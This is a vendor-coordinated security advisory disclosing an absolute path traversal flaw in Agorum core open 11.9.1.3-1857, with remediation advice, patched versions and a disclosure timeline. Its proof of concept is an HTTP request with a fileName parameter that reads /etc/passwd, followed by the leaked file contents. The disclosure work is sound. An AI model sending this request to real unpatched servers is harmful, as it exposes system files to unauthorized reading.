usd-2025-0027 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Absolute Path Traversal (CWE-36)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0027

Description

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

The support module of agorum cores REST API permits an attacker with administrative rights to access arbitrary files on the system. The following request can be used to read the /etc/passwd file:

GET /api/rest/support/status/downloadZip?fileName=/etc/passwd HTTP/1.1
Host: localhost
Cookie: JSESSIONID=[REDACTED];
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

 

[...]

The servers response will include the full content of the requested file, as can be seen in the following output:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Disposition: attachment; filename*=utf-8''passwd
Date: Mon, 28 Apr 2025 08:45:42 GMT
Content-Type: application/zip
Server: Apache-Coyote/1.1
Content-Length: 3510

 

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
[...]

Fix


It is recommended to ensure that user input is properly validated and sanitized to prevent the use of absolute paths or dangerous characters. Always use relative paths for file access to prevent users from navigating outside the intended directories. Implement a whitelist to restrict file access to specific, trusted locations and limit file system permissions to necessary files and directories.

 Users of agorum core open can upgrade to versions 11.9.2 and 11.10.1.

 

References

Timeline

  • 2025-05-05: First contact request via mail.
  • 2025-05-05: The vendor has confirmed the delivery and has begun investigating the matter.
  • 2025-05-07: The vendor has begun addressing and fixing the issue.
  • 2025-05-15: The vendor has addressed and fixed the vulnerability within the cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.